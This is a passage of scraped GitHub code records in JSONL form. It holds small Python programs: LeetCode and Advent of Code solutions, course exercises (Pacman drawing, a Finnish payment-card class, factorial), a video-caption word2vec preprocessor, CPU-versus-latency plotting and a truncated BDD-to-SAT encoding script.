\t\t\tresult+=self.combinationRecDP(nums, target-nums[i], dp_array)\n \tdp_array[target]=result\n\n \treturn dp_array[target]\n\n \n\n\n\nif __name__==\"__main__\":\n\ts=Solution()\n\tprint(s.combinationSum4([1, 2, 3], 4))","repo_name":"rsumukha/leetcode","sub_path":"377_combination_sum_4.py","file_name":"377_combination_sum_4.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36134747178","text":"# 计算所有以python代码为答案的M2\n\nimport json\nimport os\nimport zipfile\n\nf = open('averageDepthApproach/averageDepth.json', encoding='utf-8')\nres = f.read()\ndata = json.loads(res)\nf1 = open(\"cAnswer.json\", encoding=\"utf-8\")\nres1 = f1.read()\ndata1 = json.loads(res1)\n\ncQuestion = []\nfor key in data1:\n cQuestion.append(int(key[\"case_id\"]))\n\npos = 0\npythonQuestion = []\ndepth = []\nfor key in data:\n if key[\"case_Id\"] not in cQuestion:\n pythonQuestion.append(key[\"case_Id\"])\n pos += 1\n\n# path = \"C:\\\\Users\\\\asus\\\\Desktop\\\\nestedBlock1\"\nz = zipfile.ZipFile('../../../data_collection/answers.zip')\nfor i in range(0, pos):\n # print(pythonQuestion[i])\n # filename = str(pythonQuestion[i]) + \".py\"\n # path1 = os.path.join(path, filename)\n path1 = \"answers/\" + str(pythonQuestion[i]) + \".py\"\n f = z.open(path1)\n tempDepth = 0\n count = 0\n tempDepth1 = []\n for line in f:\n line = str(line, encoding='utf-8')\n line = line.replace('\\t', ' ')\n temp = 0\n line1 = line.strip()\n if len(line1) == 0 or line1.startswith('#'):\n continue\n for i in line:\n if i.isspace():\n temp += 1\n else:\n count += 1\n break\n tempDepth1.append(temp)\n length = len(tempDepth1)\n for i in range(0, length - 1):\n 
if tempDepth1[i] > tempDepth1[i + 1]:\n tempDepth += tempDepth1[i]\n if tempDepth1[length - 1] != 0:\n tempDepth += tempDepth1[length - 1]\n\n depth1 = (tempDepth // 4) / count\n depth.append(depth1)\n\nlis = []\nfor i in range(0, pos):\n dic = {\"case_Id\": pythonQuestion[i], \"Average Block Depth\": depth[i]}\n lis.append(dic)\n\nprint(len(lis))\nwith open(\"averageDepthApproach/averageDepthOfPython.json\", \"w\") as f:\n json.dump(lis, f)\n print(\"finished\")\n","repo_name":"Gabrilll/StatisticalMethodofSoftwareEngineering","sub_path":"analysis_of_code/matrix/dimensions/averageDepthOfPython.py","file_name":"averageDepthOfPython.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7455844792","text":"from collections import namedtuple\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sqlite3\nfrom typing import List\nimport math\nimport psutil\n\nMeasurement = namedtuple('Measurement', ['time', 'measurement'])\n\n# DATABASE = 'flask_monitoringdashboard.db'\nDATE = '2021-01-08'\nSERVER = 'A'\nLENGTH = 10\nBASE_TRAFFIC_PER_MINUTE = 100\nREGRESSION_LEVEL = 2\nREGRESSION_MAGNITUDE = 1\nWINDOW = 10\nWINDOW_SIZE = timedelta(seconds=WINDOW)\n\nDATABASE = 'db_' + DATE + '_' + SERVER + '_length_' + str(LENGTH) + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_regression_' + str(REGRESSION_LEVEL) + \"_\" + str(REGRESSION_MAGNITUDE) + '.db'\n\n#####\n# DB Management\n#####\n\ndef load_db_cursor():\n return sqlite3.connect(DATABASE).cursor()\n\n\ndef load_measurements_from_db(query):\n cursor = load_db_cursor()\n cursor.execute(query)\n\n return cursor.fetchall()\n\n\ndef format_date(date):\n return datetime.strptime(date, '%Y-%m-%d %H:%M:%S.%f')\n\n\ndef load_cpu_usage() -> List[Measurement]:\n resultset = load_measurements_from_db(\n 'SELECT * FROM CustomGraphData ORDER BY time ASC'\n )\n\n return [Measurement(\n time=format_date(d[2]),\n measurement=d[3]\n ) for d in resultset]\n\n\ndef load_residence_times() -> List[Measurement]:\n resultset = load_measurements_from_db(\n 'SELECT duration, time_requested FROM Request ORDER BY time_requested ASC'\n )\n\n return [Measurement(\n time=format_date(d[1]),\n measurement=d[0]\n ) for d in resultset]\n\n#####\n# CPU data processing\n#####\n\ndef average_time_from_window(window):\n return window[0][0] + WINDOW_SIZE / 2\n\n\ndef average_cpu_from_window(window):\n return np.average([w[1] for w in window])\n\n\ndef average_for_windows(measurements: List[Measurement]):\n if not measurements: return []\n\n measurement_delta = measurements[1].time - measurements[0].time\n per_window = int(round(WINDOW_SIZE / measurement_delta))\n count = len(measurements) / per_window\n print(measurement_delta, per_window, count)\n \n windows = np.array_split(measurements, count)\n results = [Measurement(\n time = average_time_from_window(window),\n measurement = average_cpu_from_window(window)\n ) for window in windows]\n\n return results\n\n\n#####\n# Request data processing\n#####\n\ndef create_empty_cpu_buckets():\n buckets = {}\n for i in range(101): buckets[i] = []\n\n return buckets\n\n\ndef time_difference(time1, time2):\n return abs((time1 - time2).total_seconds())\n\n\ndef closest_cpu_measurement(cpu_usage: List[Measurement], time) -> List[Measurement]:\n deltas = [dict(\n time_diff = time_difference(time, c.time),\n cpu_measurement = c.measurement\n ) for c in cpu_usage]\n smallest_delta = sorted(deltas, key=lambda 
k: k['time_diff'])[0]\n cpu_usage = smallest_delta['cpu_measurement']\n\n return int(round(cpu_usage))\n\n\ndef populate_buckets(residence_times, buckets, cpu_usage):\n for measurement in residence_times:\n cpu_measurement = closest_cpu_measurement(cpu_usage, measurement.time)\n buckets[cpu_measurement].append(measurement)\n\n return buckets\n\n\ndef average_latency_for_bucket(buckets, cpu):\n if (len(buckets[cpu]) == 0): return None\n\n measured_latencies = [m.measurement for m in buckets[cpu]]\n\n return np.average(measured_latencies)\n\n\ndef requests_per_minute(minute):\n traffic_multiplier = -math.cos(4 * minute / math.pi) + 2\n\n return traffic_multiplier * BASE_TRAFFIC_PER_MINUTE\n\n#####\n# Main\n#####\n\nif __name__ == '__main__':\n # Load and process CPU data to get average CPU usage\n cpu_usage_measurements = load_cpu_usage()\n cpu_usage_averages = average_for_windows(cpu_usage_measurements)\n # Load request data\n residence_times = load_residence_times()\n print(len(residence_times))\n # Create CPU usage buckets\n buckets = create_empty_cpu_buckets()\n buckets = populate_buckets(residence_times, buckets, cpu_usage_averages)\n # Average request latency by CPU usage\n latency_per_bucket = [dict(\n latency = average_latency_for_bucket(buckets, cpu),\n cpu_usage = cpu\n ) for cpu in buckets.keys()]\n average_latency = [c for c in sorted(\n latency_per_bucket, key=lambda r: r['cpu_usage']\n ) if c['latency'] and c['latency'] < 1000 and\n c['cpu_usage'] > 5 and c['cpu_usage'] < 95]\n print(average_latency)\n\n cpu_usages = [r['cpu_usage'] for r in average_latency]\n latencies = [r['latency'] for r in average_latency]\n\n # Plot request frequency over time\n plt.figure()\n plt.subplot(2, 1, 1)\n times = np.arange(0, LENGTH, 1 / 60)\n rm = [requests_per_minute(t) for t in times]\n plt.plot([t*60 for t in times], rm)\n plt.axhline(y=min(rm), linestyle='--', label='Minimum RPM')\n print(max(rm))\n plt.axhline(y=max(rm), linestyle='--', label='Maximum RPM')\n plt.title('RPM over time')\n plt.xlabel('Time in seconds since start simulation')\n plt.ylabel('RPM')\n plt.legend()\n\n # Plot CPU usage over time\n plt.subplot(2, 1, 2)\n plt.xticks(rotation=45)\n plt.title('CPU usage over time')\n plt.xlabel('Time in seconds since start simulation')\n start = cpu_usage_averages[0].time\n plt.plot([(measurement.time - start).total_seconds() for measurement in cpu_usage_averages],\n [measurement.measurement for measurement in cpu_usage_averages])\n\n # Plot CPU usage versus latency\n plt.figure()\n plt.title('CPU usage vs latency')\n plt.plot(cpu_usages, latencies, 'x-')\n x = np.arange(0, 100, 0.01)\n z = np.polyfit(cpu_usages, latencies, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x), 'r--', label='Trend line')\n plt.fill_between(cpu_usages, latencies)\n plt.xlabel('CPU Usage')\n plt.ylabel('Latency')\n plt.legend()\n plt.xlim(0, 100)\n MIN_LATENCY = 0.0\n MAX_LATENCY = 500.0\n plt.ylim(MIN_LATENCY, MAX_LATENCY)\n plt.savefig(SERVER + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_window_' + str(WINDOW) + '_regression_' + str(REGRESSION_LEVEL) + '_latency' + '.png')\n\n # Plot CPU usage vs service time\n plt.figure()\n service_times = [c['latency'] * (1 - c['cpu_usage'] / 100)\n for c in average_latency]\n cpu_usages = [c['cpu_usage'] for c in average_latency]\n plt.plot(cpu_usages, service_times)\n plt.fill_between(cpu_usages, service_times)\n plt.xlabel('CPU usage')\n plt.ylabel('Service time')\n plt.axhline(y=np.median(service_times), color='r', linestyle='-',\n label='Median service time')\n 
plt.legend()\n plt.xlim(0, 100)\n MIN_LATENCY = 0.0\n MAX_LATENCY = 350.0\n plt.ylim(MIN_LATENCY, MAX_LATENCY)\n plt.savefig(SERVER + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_window_' +\n str(WINDOW) + '_regression_' +\n str(REGRESSION_LEVEL) + '_service' + '.png')\n \n plt.show()\n","repo_name":"alexander34ro/flask-monitoring-dashboard-data-miner","sub_path":"prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37100761145","text":"\"\"\"\nProgram to animate a Pacman character.\n\"\"\"\n\nfrom pgl import GWindow, GArc, GOval, GLine, GRect\n\nGW_WIDTH = 900\nGW_HEIGHT = 400\nPACMAN_RADIUS = 50\nPILL_RADIUS = 10\nPACMAN_SPEED = 2\n\n\ndef pacman():\n \"\"\"Draws and animates a pacman across the screen\"\"\"\n\n def setup_scene():\n \"\"\"\n Creates the scene, including the background, the corridor walls, and\n the yellow pills.\n\n Returns the background object for later comparisons to ensure that the\n background is not removed.\n \"\"\"\n midx, midy = GW_WIDTH / 2, GW_HEIGHT / 2\n # Creating the background\n bg = GRect(GW_WIDTH,GW_HEIGHT)\n bg.set_filled(True)\n bg.set_color(\"black\")\n gw.add(bg)\n # Creating the corridor walls\n for shift in range(-1, 2, 2):\n line = GLine(\n 0,\n midy + shift * PACMAN_RADIUS * 1.25,\n GW_WIDTH,\n midy + shift * PACMAN_RADIUS * 1.25,\n )\n line.set_color(\"blue\")\n line.set_line_width(10)\n gw.add(line)\n # Creating the pills\n y = GW_HEIGHT / 2 - PILL_RADIUS\n for x in range(20, GW_WIDTH, 100):\n if x < midx - PACMAN_RADIUS or x > midx + PACMAN_RADIUS:\n pill = GOval(x, y, 2 * PILL_RADIUS, 2 * PILL_RADIUS)\n pill.set_filled(True)\n pill.set_color(\"yellow\")\n gw.add(pill)\n return bg\n\n\n gw = GWindow(GW_WIDTH, GW_HEIGHT)\n bg = setup_scene()\n\n\nif __name__ == \"__main__\":\n pacman()\n","repo_name":"rembold-cs151-master/Section07","sub_path":"Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14800507709","text":"import torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\n\n'''\nEvery caption of a video => convert to 2D Matrix and store in pt file.\ne.g = {'vid':[arry(10,300), array(20, 300)]} means 2 captions each containing\n10 and 20 words resp. 
Each word is represented by vector of dim 300.\n'''\n\ndictionary_path = '../../../dataset/MSVD/word2vec/word2vec.pt'\ndictionary = torch.load(dictionary_path)\n\ndataset_path = '../../../dataset/MSVD/dataset_english.txt'\nassert os.path.exists(dataset_path), 'dataset path does not exists'\n\noutput_path = '../../../dataset/MSVD/caption/'\n\nprevious_id = 'mv89psg6zh4_33_46'\nvideo_cap_feature = []\n\ndef removeNonEnglish(s):\n english_word = \"\".join(i for i in s if i.isalpha()==True)\n return english_word\n\nwith open(dataset_path, 'r') as file:\n for _, row in enumerate(tqdm(file)):\n\n row_list = row.split('\\t')\n vid = row_list[0]\n caption = row_list[1]\n\n # Determine num of words in caption\n word_per_caption = 0\n for word in caption.split():\n word = word.strip()\n if '-' in word:\n word_list = word.split('-')\n elif ',' in word:\n word_list = word.split(',')\n elif '/' in word:\n word_list = word.split('/')\n else:\n word_list = [word]\n\n for w in word_list:\n w = removeNonEnglish(w)\n if w != '' and w != ' ':\n word_per_caption += 1\n\n caption_array = np.zeros((word_per_caption, 300))\n\n # Fill caption array with word vectors.\n word_index = 0\n for word in caption.split():\n word = word.strip()\n word_list = []\n if '-' in word:\n word_list = word.split('-')\n elif ',' in word:\n word_list = word.split(',')\n elif '/' in word:\n word_list = word.split('/')\n else:\n word_list = [word]\n\n for w in word_list:\n w = removeNonEnglish(w)\n if w != '' and w != ' ':\n # print(w)\n # print(dictionary[w].shape)\n # print('caption array', caption_array.shape)\n caption_array[word_index] = dictionary[w]\n word_index += 1\n\n\n if vid != previous_id:\n caption_dict = {previous_id:video_cap_feature}\n torch.save(caption_dict, output_path + previous_id + '.pt')\n previous_id = vid\n video_cap_feature = []\n\n video_cap_feature.append(caption_array)\n\n\n\n\n\n#\n","repo_name":"pawandeep2155/Video-Captioning-Using-Object-Trajectory-Features","sub_path":"MSVD/data_preprocess/video_cap2vec.py","file_name":"video_cap2vec.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"14327777974","text":"'''\nDay 2 \nYou are to write a program that finds the factorial of a numbergti .\n'''\ndef factorial_loop(number):\n '''\n this uses a for loop to find the factorial of a number\n '''\n result = 1\n for i in range(1, number+1):\n result *= i\n return result\nanynumber = int(input(\"Enter any nymber to find it's factorial >> \")) \nprint(factorial_loop(anynumber))","repo_name":"ConsonanceClub/100_Days_of_code_submissions","sub_path":"submissions/dbugshe2/day2/factorialFinderLoop.py","file_name":"factorialFinderLoop.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"8223955403","text":"def leiaDin(msg):\n ok = False\n v = 0\n while True:\n p = str(input(msg))\n if p.isnumeric():\n v = int(p)\n ok = True\n else:\n print('\\033[0;31mERRO! 
DIGITE UM VALOR VÁLIDO.\\033[m')\n if ok:\n break\n return v","repo_name":"pemedeiros/python-CeV","sub_path":"pacote-download/CursoemVideo/ex111/utilidadesCeV/dado/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511782263","text":"with open(\"input\") as f:\n keys = [int(l.strip()) for l in f.readlines()]\n\nsub = 7\np = 20201227\nn = 0\nwhile True:\n if pow(sub, n, p) == keys[0]:\n loop_size = n\n break\n n += 1\n\nprint(pow(keys[1], loop_size, p))\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2020/dec25/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3630387665","text":"# TEE RATKAISUSI TÄHÄN:\n\nclass Maksukortti:\n def __init__(self, saldo: float):\n self.saldo = saldo\n\n def lataa_rahaa(self, lisays: float):\n self.saldo += lisays\n\n def ota_rahaa(self, maara: float):\n if self.saldo >= maara:\n self.saldo -= maara\n return True\n else:\n return False\n # Toteuta metodi siten, että se ottaa kortilta rahaa vain, jos saldoa riittää\n # Onnistuessaan metodi palauttaa True ja muuten False\n\nclass Kassapaate:\n\n maukkaan_hinta = 4.3\n edullisen_hinta = 2.5\n \n def __init__(self):\n # kassassa on aluksi 1000 euroa rahaa\n self.rahaa = 1000\n self.edulliset = 0\n self.maukkaat = 0\n\n def syo_edullisesti(self, maksu: float):\n # Edullinen lounas maksaa 2.50 euroa\n # Kasvatetaan kassan rahamäärää edullisen lounaan hinnalla ja palautetaan vaihtorahat\n # Jos parametrina annettu maksu ei ole riittävän suuri, ei lounasta myydä ja metodi palauttaa koko summan\n if maksu >= self.edullisen_hinta:\n self.edulliset += 1\n self.rahaa += self.edullisen_hinta\n return maksu - self.edullisen_hinta\n else:\n return float(maksu)\n\n def syo_maukkaasti(self, maksu: float):\n # Maukas lounas maksaa 4.30 euroa\n # Kasvatetaan kassan rahamäärää maukkaan lounaan hinnalla ja palautetaan vaihtorahat\n # Jos parametrina annettu maksu ei ole riittävän suuri, ei lounasta myydä ja metodi palauttaa koko summan \n if maksu >= 4.3:\n self.maukkaat += 1\n self.rahaa += self.maukkaan_hinta\n return maksu - self.maukkaan_hinta\n else:\n return float(maksu)\n\n def syo_edullisesti_kortilla(self, kortti:Maksukortti):\n # Edullinen lounas maksaa 2.50 euroa\n # Jos kortilla on tarpeeksi rahaa, vähennetään hinta kortilta ja palautetaan True\n # Muuten palautetaan False\n if kortti.saldo >= self.edullisen_hinta:\n kortti.saldo -= self.edullisen_hinta\n self.edulliset += 1\n return True\n else:\n return False\n\n def syo_maukkaasti_kortilla(self, kortti:Maksukortti):\n # Maukas lounas maksaa 4.30 euroa\n # Jos kortilla on tarpeeksi rahaa, vähennetään hinta kortilta ja palautetaan True\n # Muuten palautetaan False\n if kortti.saldo >= self.maukkaan_hinta:\n kortti.saldo -= self.maukkaan_hinta\n self.maukkaat += 1\n return True\n else:\n return False\n\n def lataa_rahaa_kortille(self, kortti: Maksukortti, summa: float):\n self.rahaa += summa\n kortti.lataa_rahaa(summa) \n\n def __repr__(self):\n return f\"kassassa rahaa {self.rahaa} edullisia lounaita myyty {self.edulliset} maukkaita lounaita myyty {self.maukkaat}\"\n\n\n\nif __name__ == \"__main__\":\n\n exactum = Kassapaate()\n print(exactum)\n\n antin_kortti = Maksukortti(2)\n\n print(f\"kortilla rahaa {antin_kortti.saldo} euroa\")\n\n onnistuiko = 
exactum.syo_maukkaasti_kortilla(antin_kortti)\n print(\"riittikö raha:\", onnistuiko)\n\n exactum.lataa_rahaa_kortille(antin_kortti, 100)\n\n onnistuiko = exactum.syo_maukkaasti_kortilla(antin_kortti)\n print(\"riittikö raha:\", onnistuiko)\n\n print(f\"kortilla rahaa {antin_kortti.saldo} euroa\")\n\n print(exactum)","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa09-04_maksukortti_ja_kassapaate/src/maksukortti_ja_kassapaate.py","file_name":"maksukortti_ja_kassapaate.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3243743266","text":"import sys\nimport os\nimport math\nfrom pyeda.inter import *\n\n# MODES\nST_BITS\t= 0 \nBDD_N0 \t= 1 \nBDD_LE \t= 2 \nTR_LV \t= 3 \nTR_NO \t= 4 \nTR_LE \t= 5 \n\t\nvars_Step = []\nlitCorr = dict()\n\ndef MC_to_SAT1(ini_S_inp, tgt_S_inp, bdd_inp, coins_inp ,K_inp,trace_file,out_file=\"\"):\n\t# func_argv = [\"\",inp_file,out_file,trace_file]\n\t# value is scaled to coins\n\tglobal vars_Step\n\tglobal litCorr\n\n\tdef equi_clause(p,q):\n\t\t\tclses = []\n\t\t\tclses.append([[not(p[0]),p[1]],q])\n\t\t\tclses.append([p,[not(q[0]),q[1]]])\n\t\t\treturn clses\n\n\tdef equi_clause_and_list(p,lst):\n\t\t\tclses = []\n\t\t\tclses.append([p] + [[not(l[0]),l[1]] for l in lst])\n\t\t\tfor l in lst:\n\t\t\t\tclses.append([[not(p[0]),p[1]],l])\n\t\t\treturn clses\n\n\tdef equi_clause_list(p,lst):\n\t\t\tclses = []\n\t\t\tclses.append([[not(p[0]),p[1]]]+lst)\n\t\t\tfor lit in lst:\t\n\t\t\t\tclses.append([p,[not(lit[0]),lit[1]]])\n\t\t\treturn clses\n\n\tdef get_sbit(lvl):\n\t\tlvltree = lvl - 10\n\t\treturn lvltree\n\n\tdef litCorrGen(inps):\n\t\tglobal litCorr\n\t\tglobal vars_Step\n\t\t\n\t\tdiff = set(inps) - set(vars_Step)\n\t\ts1 = len(inps)\n\t\ts2 = len(vars_Step)\n\t\td = len(diff)\n\t\tdiff2 = list(diff)\n\n\t\tfor aux_i in range(len(diff2)):\n\t\t\taux = diff2[aux_i]\n\t\t\tlitCorr[inps.index(aux)] = s2 + aux_i + 1\n\t\t\n\t\tfor v_i in range(len(vars_Step)):\n\t\t\tv = vars_Step[v_i]\n\t\t\tlitCorr[inps.index(v)] = v_i + 1\n\t\t\n\t\tprint(len(inps))\n\n\n\tdef parse_Ast(expr_ast):\n\t\t# lits = set()\n\t\tlits = 0\n\t\tclauses = []\n\t\tif expr_ast[0] == 'and':\n\t\t\tfor exp in expr_ast[1:]:\n\t\t\t\tcl1,lits1 = parse_Ast(exp)\n\t\t\t\tlits = max(lits1,lits)\n\t\t\t\tclauses += cl1\n\n\t\tif expr_ast[0] == 'or':\n\t\t\tclause = []\n\t\t\tfor exp in expr_ast[1:]:\n\t\t\t\tcl1,lits1 = parse_Ast(exp)\n\t\t\t\tlits = max(lits1,lits)\n\t\t\t\tclause += cl1[0]\n\t\t\tclauses = [clause]\n\n\t\tif expr_ast[0] == 'lit':\n\t\t\tlit = expr_ast[1]\n\t\t\tif lit < 0:\n\t\t\t\tlits = -1*lit\n\t\t\t\tclauses = [[ [litCorr[lits], False] ]]\n\t\t\telse:\n\t\t\t\tlits = lit\n\t\t\t\tclauses = [[ [litCorr[lits], True] ]]\n\t\t\t\n\t\tif expr_ast[0] == 'const':\n\t\t\tlits = 1\n\t\t\tif expr_ast[1] == 1:\n\t\t\t\tclauses = [[ [1, True] [1, False] ]]\n\t\t\tif expr_ast[1] == 0:\n\t\t\t\tclauses = [[ ]]\n\t\t\t\n\t\treturn clauses,lits\n\n\n\tclauses=[]\n\tK = K_inp\n\ttgt_S = tgt_S_inp\n\tini_S = ini_S_inp\n\tcoins = coins_inp\n\t# List of nodes and list of leaves\n\t# bdds[0] ==> [id,var,low,high] node\n\t# bdds[1] ==> [id,type,\"value\"] leaves\n\t# value is scaled\n\tbdd = bdd_inp\n\t\n\t# MODES\n\t# 0 S(k,i)\n\t# 1 bdd nodes\n\t# 2 bdd leaves\n\t# 3 tree levels\n\t# 4 tree nodes\n\t# 5 tree leaves\n\tI = []\n\tfor i1 in range(len(ini_S)):\n\t\tx = ini_S[i1]\n\t\tif 
x==0:\n\t\t\tI.append([False,[ST_BITS,0,i1]])\n\t\telse:\n\t\t\tI.append([True,[ST_BITS,0,i1]])\n\t\n\tF = []\n\tfor i1 in range(len(tgt_S)):\n\t\tx = tgt_S[i1]\n\t\tif x==0:\n\t\t\tF.append([False,[ST_BITS,0,i1]])\n\t\telse:\n\t\t\tI.append([True,[ST_BITS,0,i1]])\n\n\t# clauses = clauses + I\n\n\tpar_cond = [[] for x in range(len(bdd[0]) + len(bdd[1])+1)] \n\tpar_expr = [[] for x in range(len(bdd[0]) + len(bdd[1])+1)] \n\t\n\t# vars_Step = dict()\n\t\n\tbdd_vars = [exprvar((\"bdd_\"+str(x))) for x in range(len(bdd[0]) + len(bdd[1])+1)]\n\t\n\tvars_Step += bdd_vars[1:]\n\t# for var_i in range(1,len(bdd_vars)):\n\t# \tvars_Step[bdd_vars[var_i]] = var_i + (len(ini_S)*2)\n\t\t\n\tfor node in bdd[0]:\n\t\tlcd = node[2]\n\t\trcd = node[3]\n\t\tpar_cond[lcd].append([get_sbit(node[1]),node[0],False])\n\t\tpar_cond[rcd].append([get_sbit(node[1]),node[0],True])\n\t\n\ts_vars = [0 for x in range(len(ini_S) *2)] \n\tfor sb_i in range(len(s_vars)):\n\t\tstr_i = \"s_\" + str(sb_i)\n\t\ts_vars[sb_i] = exprvar(str_i)\n\n\tvars_Step += s_vars\n\t# for var_i in range(len(s_vars)):\n\t# \tvars_Step[s_vars[var_i]] = var_i + 1\n\n\tfor pc_i in range(1,len(par_cond)):\n\t\tpc = par_cond[pc_i]\n\t\tnode_expr = expr(0)\n\t\tfor cond in pc:\n\t\t\tif cond[2] == 0:\t\n\t\t\t\tnode_expr = Or(node_expr,And(bdd_vars[cond[1]],Not(s_vars[cond[0]])))\n\t\t\telse:\t\n\t\t\t\tnode_expr = Or(node_expr,And(bdd_vars[cond[1]],s_vars[cond[0]]))\n\n\t\t\t# node_expr = node_expr.to_cnf()\n\t\tnode_expr = Equal(bdd_vars[pc_i],node_expr)\n\t\tpar_expr[pc_i] = node_expr.tseitin()\n\t# Root of BDD true\n\tpar_expr[len(bdd[0]) + len(bdd[1])] = bdd_vars[len(bdd[0]) + len(bdd[1])]\n\t\n\tbdd_expr = expr(1)\n\tfor p_expr in par_expr[1:]:\n\t\tbdd_expr = And(bdd_expr,p_expr)\n\tbdd_expr = bdd_expr.tseitin()\n\n\ttreeN_vars = [exprvar((\"treeN_\"+str(x))) for x in range(coins*2 + 1)]\n\ttreeL_vars = [exprvar((\"treeL_\"+str(x))) for x in range(coins)]\n\ttree_expr_ske = treeN_vars[0]\n\t\n\tvars_Step += (treeN_vars + treeL_vars)\n\n\t# for var_i in range(len(treeN_vars)):\n\t# \tvars_Step[treeN_vars[var_i]] = var_i + 1 + (len(ini_S)*2) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(bdd[0]) + len(bdd[1])\n\t# for var_i in range(len(treeL_vars)):\n\t# \tvars_Step[treeL_vars[var_i]] = var_i + 1 + (len(ini_S)*2) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(bdd[0]) + len(bdd[1]) + \\\n\t# \t\t\t\t\t\t\t\t\tlen(treeN_vars)\n\t\n\tfor coin_i in range(coins):\n\t\tlvl = coin_i+1\n\t\ttree_expr_ske = And(tree_expr_ske,\n\t\t\t\t\t\tEqual(treeN_vars[lvl*2], And(treeN_vars[(lvl-1)*2], treeL_vars[coin_i])) ,\n\t\t\t\t\t\tEqual(treeN_vars[lvl*2 - 1], And(treeN_vars[(lvl-1)*2], Not(treeL_vars[coin_i]))) ) \n\t\n\t# tree_expr = tree_expr_ske.tseitin()\t\t\n\ttree_expr = tree_expr_ske\t\t\n\t\n\t\n\tbcnt_exprs = [expr(0) for x in range(len(bdd[1]))]\n\tfor leaf_i in range(len(bdd[1])):\n\t\tleaf = bdd[1][leaf_i]\n\t\tval = leaf[2]\n\t\t# val = bin(int(val))[2:] \n\t\tif val[0] == '1':\n\t\t\tbcnt_exprs[leaf_i] = expr(1)\n\t\telse:\t\n\t\t\tfor bit_i in range(len(val[1:])) :\n\t\t\t\tbit = val[bit_i + 1]\n\t\t\t\tlvl = bit_i + 1\n\t\t\t\tif bit == '1':\n\t\t\t\t\tbcnt_exprs[leaf_i] = Or(bcnt_exprs[leaf_i],\n\t\t\t\t\t\t\t\t\t\t\ttreeN_vars[lvl*2 - 1])\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\ttree_expr = And(tree_expr,\n\t\t\t\t\t\tImplies(bdd_vars[leaf[0]], bcnt_exprs[leaf_i]))\n\n\ttree_expr = tree_expr.tseitin()\n\n\tsstep_expr = And(bdd_expr,tree_expr)\n\tsstep_expr = sstep_expr.tseitin()\n\n\tlits=[]\t\n\tclauses=[]\t\n\n\texpr_ast = 
sstep_expr.to_ast()\n\tprint(expr_ast)\n\tprint(sstep_expr.inputs)\n\tlitCorrGen(sstep_expr.inputs)\n\tclauses,lits = parse_Ast(expr_ast)\n\t# list of lits\n\t# lit :: [no, t/f]\n\n\t# 1 to 2*log(S) \n\t# +1 to + len bdd_vars \n\t# +1 to + tree nodes\n\t# +1 to + tree levels\n\n\tsst_Vars = len(ini_S) * 2\n\tsbdd_Vars = len(bdd[0]) + len(bdd[1])\n\tstreeN_Vars = 2*coins + 1 \n\tstreeL_Vars = coins \n\tsaux_Vars = lits - (sst_Vars + sbdd_Vars + streeN_Vars + streeL_Vars)\n\n\tsLst_Vars = len(ini_S) * 2\n\tsLbdd_Vars = len(bdd[0]) + len(bdd[1]) + sLst_Vars\n\tsLtreeN_Vars = 2*coins + 1 + sLbdd_Vars\n\tsLtreeL_Vars = coins + sLtreeN_Vars\n\tsLaux_Vars = lits \n\t\n\n\tcurrLits = lits\n\tnewLits = currLits - len(ini_S)\n\n\tI = []\n\tfor i1 in range(len(ini_S)):\n\t\tx = ini_S[i1]\n\t\tif x==0:\n\t\t\tI.append([[1 + i1*2, False]])\n\t\telse:\n\t\t\tI.append([[1 + i1*2, True]])\n\tFclauses = I\n\t\n\tF = []\n\tfor i1 in range(len(tgt_S)):\n\t\tx = tgt_S[i1]\n\t\tif K>0:\n\t\t\tif K==1:\n\t\t\t\ttgtVar = 1 + i1*2 + 1\n\t\t\telse:\n\t\t\t\ttgtVar = 1 + currLits + newLits*(K-2) + i1\n\t\telse:\n\t\t\ttgtVar = 1 + i1*2\n\t\tif x==0:\n\t\t\tF.append([[tgtVar, False]])\n\t\telse:\n\t\t\tF.append([[tgtVar, True]])\t\n\tFclauses += F\n\n\tFclauses += clauses\n\t\n\tclauses2 = []\n\tif K > 1:\t\n\t\tfor clause in clauses:\n\t\t\ttemp = []\n\t\t\tfor lit in clause:\n\t\t\t\tif lit[0] <= sLst_Vars: \n\t\t\t\t\tif lit[0]%2 == 1:\n\t\t\t\t\t\ttemp.append([lit[0]+1, lit[1]])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttemp.append([(lit[0])/2 + currLits , lit[1]])\t\n\t\t\t\telse: \n\t\t\t\t\ttemp.append([lit[0]+ newLits, lit[1]])\n\t\t\tclauses2.append(temp)\n\tFclauses += clauses2\n\n\tfor clause_i in clauses:\n\t\tclause = clauses[clause_i]\n\t\tfor lit_i in clause:\n\t\t\tlit = clause[lit_i]\n\t\t\tif lit[0] <= 